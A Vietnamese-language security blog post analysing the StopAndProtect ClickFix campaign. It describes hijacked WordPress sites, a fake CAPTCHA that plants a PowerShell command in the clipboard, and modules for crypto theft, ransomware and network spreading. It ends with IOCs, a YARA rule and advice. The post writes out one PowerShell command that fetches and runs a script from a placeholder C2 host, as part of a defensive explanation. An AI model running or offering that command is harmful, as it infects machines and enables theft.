Skip to main content

Command Palette

Search for a command to run...

Gần 2.000 Website WordPress Bị Chiếm Dụng: Bí Mật Phía Sau Chiến Dịch StopAndProtect

Updated
12 min readView as Markdown
Gần 2.000 Website WordPress Bị Chiếm Dụng: Bí Mật Phía Sau Chiến Dịch StopAndProtect

Bạn có tin rằng chỉ một cú nhấp chuột vào ô xác minh "Tôi không phải là người máy" (CAPTCHA) quen thuộc lại có thể rút sạch ví tiền điện tử và biến máy tính của bạn thành "nô lệ" trong một mạng lưới tội phạm toàn cầu?

Tháng 5/2026, các chuyên gia an ninh mạng tại Check Point Research đã vạch trần StopAndProtect – một chiến dịch ngầm quy mô lớn đang âm thầm biến gần 2.000 website WordPress uy tín thành những "bãi mìn" kỹ thuật số. Tuy nhiên, đây không đơn thuần là một vụ phát tán mã độc thông thường. Những gì ẩn giấu đằng sau chiến dịch này sẽ khiến bạn đi từ bất ngờ này đến kinh ngạc khác:

  • Cú lừa ClickFix ma quái: Làm thế nào mà một thông báo CAPTCHA giả mạo lại có thể lừa nạn nhân tự tay dán mã độc vào máy tính của mình mà không hề nghi ngờ?

  • "Con dao Thụy Sĩ" của giới tội phạm: Tại sao StopAndProtect không chỉ là Ransomware đòi tiền chuộc, mà còn là một kho vũ khí đa năng—tự động lục soát ví Crypto, chiếm quyền WhatsApp để do thám danh bạ, và âm thầm chụp ảnh màn hình nạn nhân 30 giây/lần?

  • Pha "tự bóp" ngớ ngẩn nhất lịch sử (The OPSEC Blunder): Kịch tính nhất của chiến dịch nằm ở việc kẻ chủ mưu đã phạm một sai lầm chết người: Tự lây nhiễm mã độc vào chính máy tính cá nhân của mình! Chính sự cố hài hước này đã vô tình dâng nộp cho giới bảo mật kho lưu trữ 31.000 bức ảnh màn hình bí mật, cùng toàn bộ công cụ điều hành botnet viết bằng ngôn ngữ... Visual Basic 6 từ thập niên 90.

Tại Sao Lại Gọi Là "ClickFix"?

ClickFix (ghép từ Click - Nhấp chuột và Fix - Sửa lỗi) là một kỹ thuật lừa đảo tâm lý (Social Engineering) thế hệ mới vô cùng nguy hiểm.

  • Điểm khác biệt với lừa đảo truyền thống: Trước đây, tin tặc thường lừa bạn tải về một file .exe hoặc .zip rồi mở ra. Tuy nhiên, các trình duyệt hiện đại (Chrome, Edge) và phần mềm diệt virus sẽ cảnh báo ngay khi bạn tải file lạ.

  • Cách ClickFix vượt rào: ClickFix không tải bất kỳ file nào về đĩa cứng. Thay vào đó, nó lợi dụng lòng tin và thói quen của người dùng, lừa bạn tự tay chép và dán lệnh độc hại vào hệ thống. Vì chính bạn là người thực thi lệnh, các phần mềm bảo mật thường lầm tưởng đó là thao tác hợp lệ của quản trị viên!

Mạng Lưới "Nô Lệ" WordPress – Hạ Tầng Tàng Hình Của Tin Tặc

Để bắt đầu một chiến dịch lừa đảo quy mô lớn, kẻ tấn công cần máy chủ để chứa mã độc và điều khiển tấn công. Thay vì bỏ tiền thuê máy chủ riêng (dễ bị cảnh sát mạng truy vết và khóa lại), nhóm StopAndProtect đã chọn cách chiếm đoạt gần 2.000 website WordPress kém bảo mật trên toàn thế giới.

Tuyệt chiêu "Backdoor tàng hình" qua MU-Plugins:

Các trang web bị hack chủ yếu chạy phiên bản WordPress cũ (từ năm 2021 dính tới 40 lỗ hổng) hoặc cài plugin chưa vá. Kẻ tấn công cắm chốt trên các website này bằng một chiêu thức cực kỳ tinh vi:

  1. Cài đặt Must-Use Plugin (MU-Plugin): Kẻ tấn công tải lên file script mu-uploader-installer.php. Script này âm thầm tạo một plugin đặc biệt tại đường dẫn wp-content/mu-plugins/wp-sec.php.

    Nói một cách dễ hiểu**:** Trong WordPress, MU-Plugin là dạng plugin "bắt buộc chạy" – nó tự khởi động mỗi khi có người truy cập web nhưng hoàn toàn không hiển thị trong danh sách Plugin ở giao diện quản trị. Quản trị viên rất khó phát hiện!

  2. Tạo Cổng Cửa Sau (Hidden REST API Endpoint): Plugin ẩn này mở ra cổng /wp-json/wp-sec/v1/upload. Kẻ tấn công chỉ cần gửi yêu cầu kèm mật khẩu cứng (hardcoded) là có thể tải lên bất kỳ tệp tin độc hại nào (kể cả file .php để chiếm toàn bộ quyền máy chủ).

  3. Xóa dấu vết cài đặt: Ngay sau khi thiết lập xong cửa hậu, file cài đặt ban đầu tự hủy (self-delete), khiến mọi vết tích biến mất.

Kịch Bản "ClickFix" – Cú Lừa CAPTCHA Tinh Vi Đến Mức Nào?

BƯỚC 1: Sàng Lọc Mục Tiêu & Kiểm Tra Môi Trường

Khi bạn truy cập vào một website WordPress đã bị tin tặc chiếm quyền, kịch bản độc hại verify.php nằm ẩn trên máy chủ sẽ lập tức khởi chạy một trình kiểm tra ngầm:

  1. Kiểm tra Hệ Điều Hành:

    • Nếu trình duyệt gửi thông tin là Windows OS ➔ Kích hoạt bẫy ClickFix.

    • Nếu là macOS, Linux, Android hoặc iOS ➔ Bỏ qua, cho phép xem nội dung website bình thường.

  2. Mục đích của việc sàng lọc:

    • Tránh gây nghi ngờ đối với người dùng di chuyển bằng điện thoại hoặc máy Mac.

    • Đảm bảo câu lệnh PowerShell chuẩn bị tung ra sẽ chạy thành công 100% (vì chỉ hệ điều hành Windows mới có PowerShell mặc định).

BƯỚC 2: Phủ Giao Diện CAPTCHA Giả Mạo (UI Overlay)

Ngay khi xác định nạn nhân dùng Windows, một cửa sổ giả mạo đè lên toàn bộ màn hình (Overlay), che khuất nội dung trang web gốc.

  • Hình thức cực kỳ giống thật: Giao diện được thiết kế nhái theo các dịch vụ xác minh uy tín như Google reCAPTCHA, Cloudflare hoặc hCaptcha với các biểu tượng khóa an toàn, dòng chữ "Security Check" hoặc "Verify you are human".

  • Tạo sự cố giả: Màn hình hiển thị thông báo lỗi như: "Trình duyệt của bạn gặp sự cố kết nối an toàn. Vui lòng nhấn xác minh để tiếp tục truy cập."

BƯỚC 3: "Bắt Cóc" Bộ Nhớ Tạm

Đây là mắt xích kỹ thuật ngầm then chốt của ClickFix:

  1. Ngay khi nạn nhân nhấp vào ô "I am not a robot" hoặc nút "Verify", một kịch bản JavaScript ngầm (tệp vcapcha.js) trên trình duyệt lập tức được kích hoạt.

  2. Kịch bản này gọi lệnh hệ thống của trình duyệt navigator.clipboard.writeText(...) để âm thầm chép một đoạn mã độc PowerShell cực kỳ phức tạp vào Bộ nhớ tạm (RAM/Clipboard) của nạn nhân mà không phát ra bất kỳ âm thanh hay cảnh báo nào.

BƯỚC 4: Thao Túng Tâm Lý – Lừa Nạn Nhân "Tự Kích Hoạt"

Sau khi mã độc đã nằm sẵn trong bộ nhớ tạm, màn hình CAPTCHA giả mạo thay đổi giao diện, hiển thị một hướng dẫn 3 bước nhìn có vẻ rất "kỹ thuật" nhưng thực chất là một cái bẫy:

Phân tích tâm lý nạn nhân ở bước này:

  • Nạn nhân tưởng rằng dòng chữ mình dán vào là một chuỗi mã xác minh/token an toàn.

  • Thao tác Win + R (mở hộp thoại Run) và Ctrl + V diễn ra rất nhanh (chỉ mất 2-3 giây), nạn nhân thực hiện theo phản xạ mà không kịp suy nghĩ hay kiểm tra xem dòng lệnh mình dán vào thực chất chứa cái gì.

BƯỚC 5: Thực Thi Lệnh Ngầm

Ngay khi nạn nhân nhấn Enter, hộp thoại Run của Windows sẽ thực thi câu lệnh PowerShell độc hại. Hãy cùng bóc tách ý nghĩa kỹ thuật của câu lệnh này:

powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('https://<C2>/vcapcha.ps1'))

  • -w hidden (WindowStyle Hidden): Ẩn hoàn toàn cửa sổ đen PowerShell. Nạn nhân bấm Enter xong sẽ không thấy cửa sổ nào hiện ra, tưởng rằng hệ thống đang "âm thầm xác minh".

  • -ep bypass (ExecutionPolicy Bypass): Bỏ qua mọi chính sách ngăn chặn chạy file script của Windows (Execution Policy).

  • IEX (Invoke-Expression): Thực thi trực tiếp đoạn mã được tải về từ internet ngay trên bộ nhớ RAM mà không cần lưu file xuống đĩa cứng.

  • DownloadString('.../vcapcha.ps1'): Tải kịch bản lây nhiễm chính vcapcha.ps1 từ máy chủ WordPress bị hack.

BƯỚC 6: Báo Cáo Log Về Máy Chủ C2 & Chuyển Tiếp Sang Stage 2

Ngay khi đoạn mã vcapcha.ps1 chạy thành công:

  1. Gửi dữ liệu trinh sát: Mã độc gửi một yêu cầu HTTP chứa IP nạn nhân, thời gian thực thi, phiên bản Windows về Endpoint /wp-content/plugins/verify/proxy.php trên website WordPress bị chiếm quyền.

  2. Kích hoạt chuỗi lây nhiễm tiếp theo: Tiến hành giải mã và nạp Stage 1 & Stage 2 (.NET Loaders) vào RAM để chuẩn bị bung bộ vũ khí trộm ví Crypto và Ransomware (Stage 3).

  3. Trả lại giao diện: Màn hình CAPTCHA giả mạo biến mất, trình duyệt tự động làm mới (Reload) lại trang web gốc. Nạn nhân thản nhiên đọc báo/xem web mà không hề biết rằng máy tính của mình đã hoàn toàn bị khống chế!

TÓM TẮT QUY TRÌNH BẰNG BẢNG SO SÁNH

Tiêu chí Phương thức Lừa Đảo Cũ Kịch Bản ClickFix (Mới)
Thao tác nạn nhân Tải file .exe/.zip ➔ Mở file ➔ Cài đặt. Nhấn CAPTCHA ➔ Bấm Win+RCtrl+VEnter.
Cảnh báo trình duyệt Hiện cảnh báo: "File này có thể gây hại". Không hề có cảnh báo (vì dán lệnh thủ công).
Lưu trữ trên đĩa Ghi file độc hại xuống đĩa cứng. Chạy thẳng trên RAM (In-Memory Execution).
Khả năng qua mặt AV Dễ bị Antivirus bắt khi ghi file. Tỷ lệ qua mặt Antivirus cực kỳ cao.

Bộ Vũ Khí Đa Năng Stage 3 – Từ Trộm Ví Crypto Đến Tống Tiền

Khi đã nằm sâu trong máy tính, StopAndProtect bắt đầu kích hoạt các mô-đun phá hoại tùy theo mục đích của tin tặc.

SilentDataCollector – "Kẻ Trộm Thầm Lặng" Săn Ví Crypto

Đây là mô-đun nguy hiểm nhất đối với các nhà đầu tư tiền điện tử:

  • Tự động trích xuất Ví Crypto: Quét sạch ổ cứng, nén và mã hóa các tệp chứa cụm từ khôi phục (Seed Phrase), mật khẩu trình duyệt, file ví tiền điện tử dưới định dạng: <TÊN_MÁY>wallet_V<PHIÊN_BẢN>_<NGÀY_GIỜ>.zip.encrypted

  • Do thám bằng WhatsApp Automation: Kẻ tấn công gửi từ khóa (tên liên hệ) từ C2 xuống. Mã độc chờ nạn nhân không dùng máy, sau đó tự động điều khiển WhatsApp (bản Web/Desktop), gõ từ khóa vào ô tìm kiếm, mở thông tin danh bạ và chụp ảnh màn hình lấy số điện thoại của mục tiêu.

  • Chụp ảnh màn hình liên tục: Tự động chụp lại màn hình làm việc của nạn nhân 30 giây/lần.

  • Keylogger thông minh: Ghi lại mọi phím bấm và tự động lọc ra các địa chỉ Email/Tài khoản hợp lệ.

SilentEncryptor (Ransomware mã hóa dữ liệu)

  • Mã hóa toàn bộ dữ liệu hoặc các máy tính có tên (Hostname) được chỉ định từ C2.

  • Khóa mã hóa AES 32-byte được kết hợp từ tên máy và mật khẩu từng file.

  • Hiển thị thông báo đòi tiền chuộc và hướng dẫn thanh toán qua Bitcoin/USDT.

Sâu Mạng Lan Lan

  • Tự động quét các ổ đĩa mạng chia sẻ (SMB) và thiết bị USB cắm vào máy để nhân bản mã độc sang các máy tính khác trong cùng mạng LAN doanh nghiệp.

Khóa Máy & Chat Tống Tiền

  • LockScreen: Khóa chặt bàn phím và chuột, biến màn hình thành bảng thông báo nộp tiền chuộc kèm mã QR.

  • SimpleChatProxy: Mở một ứng dụng chat trực tiếp giữa nạn nhân và tin tặc để thương lượng giá giải mã.

Thống Kê Nạn Nhân & Bản Đồ Phân Bố Địa Lý

Tính đến ngày 24/07/2026, chiến dịch StopAndProtect đã lây nhiễm thành công trên 6.000+ địa chỉ IP duy nhất.

IOC

compromised websites

maximumrock[.]ro
platinumcar[.]ca
norakremer.co[.]uk
pharmart[.]ae
ksr-racingparts[.]com

compromised base C&C websites

v-k.com[.]ua
www.lapellelaser[.]pl
www.parsrulman[.]com
mectcalcutta[.]com
discherniation[.]com

PowerShell script stage 1

cab7f141fd6f2c58055b3731ef6a64b8a2d4d88a974770b047da19c0904322f0

PowerShell script stage 2

cc8aa2bd7bf74ca0bbc5cb03a7b18eae73094b450d11654528c05685fe12e0c9

stage 1 – downloader

99bcb531d6dd3c93d3f28f03d6e4659c865a4ffbd2fb514e809017f3446a940b
8337bf29100a5871b1275227006dc2a43b21b751e5ce7e2032364fd78af59ac5
4dee2fe98d4da75ffb259c03b50202212dafc85691429a28641a8068eddea504

stage 2 – downloader & loader

9765b1342cc7eb982a73bb1f94c6c500b63dc817073b76ea926c1097078d3527
7d3604d0728b242c72bd144b8661ebf63c1042a4f5dd441bc8c8507c701df20c
976cfa57e1efacbe517b7e3441e9473d275ec1d9ad8ab69ddf8ae3a966aaa153

stage 3 – encryptor

b79b9b027f76579555069a7506d946648a8cb3126c0dda837dc9fee0e5c79489
65550f6d0ffec8421f703cdc7273d9c0563b3d480fe6702bad294a18afe72143
0080d0dd72eda4850a02e51c0e5c6f768423dfe970cafae2ab52ceee75972b40

stage 3 – SMB/USB worm

8d1e23630a6695fa9c793d73832f59436c98bba30ed81c16d01b549bd17feab4
10babb15e08f9fbd72cce11713a273b971c910dd5bdb989a3f6ff4d9c8e372c0
f042240c3de00c46dee625916bf246b7e87481e4081a6a97208b091409766e41

stage 3 – lockscreen

11a635d70444605ede1de0aa227a9fd7cfa4554e75bea93ce18b639ca571a42e
2adbb2c206be7f23bf77f8f50d1ac0f809511c0b4591421931f81a6eaa42c68c
38602b76f6c65644b01fa4d81708251c159a883253cda8876396dc7212324ab9

stage 3 – credential stealer

23cbabfe3ca3a7f1eb365f772d6a4ed8095cb8f7755622cc82e804478259dc70

stage 3 – VBS spreader

b3dff910b350ace27d64cbd79405cb154a1967e366d7b88170c3e8303b1d08ad

stage 3 – chat utility

3ed8f2cc8da4853fd770ff38f0cbce6d9d4a84e75a828fc0cec3e3ec60db94f9
3ba161ca7b8dcf389ec3236c9ddfb943e9d1766181b1b81a227649cad46132a8

Yara Rule

rule StopAndProtectOperation

{

meta:

description = "Detects StopAndProtect Operation"

author = "Check Point Research"

date = "2026-05-26"

modified = "2026-05-26"

hash = "712E557373FBA45BDD66D52E395B8AF7CCF7006E6E82D4E1DB0736E738D0D4FB"

strings:

$a = "C:\\Users\\marks\\source\\"

condition:

all of them

}

Khuyến Nghị

Tuyệt Đối KHÔNG Chạy Lệnh Win + R Ctrl + V Enter

  • Không có CAPTCHA hay dịch vụ xác minh nào yêu cầu bạn tự dán lệnh PowerShell vào máy tính. Thấy yêu cầu này = 100% Lừa đảo ClickFix!

Mẹo Thử Bằng Notepad

  • Nếu lỡ bấm nút xác minh nghi vấn, hãy mở Notepad lên và dán (Ctrl + V) vào đó trước. Nếu thấy hiện câu lệnh powershell... ➔ Xóa ngay, bạn vừa né được một cú lừa!

Bảo Vệ Ví Crypto Bằng Mọi Giá

  • KHÔNG lưu 12/24 từ khôi phục (Seed Phrase) hay Private Key dưới dạng file text, ảnh chụp trên máy tính hay Cloud.

  • CHỈ viết ra giấy/khắc kim loại và cất nơi an toàn.

  • Dùng Ví cứng (Ledger, Trezor) cho tài sản lớn.

Quản Lý Mật Khẩu & Dọn Dẹp Máy Tính

  • KHÔNG lưu mật khẩu trên trình duyệt (mã độc rất dễ rút cắp). Hãy dùng trình quản lý mật khẩu riêng (Bitwarden, 1Password) + Bật 2FA qua ứng dụng.

  • KHÔNG tải phần mềm bẻ khóa (Crack/Keygen) vì đây là con đường chính phát tán mã độc.

Tài Liệu Tham Khảo

https://research.checkpoint.com/2026/thousands-of-hacked-wordpress-sites-one-operation-unmasking-stopandprotect/

https://thehackernews.com/2026/08/stopandprotect-uses-nearly-2000-hacked.html

https://www.cryptopolitan.com/it/2000-hacked-wordpress-traps-crypto-users/

More from this blog

F

FPT IS Security

972 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.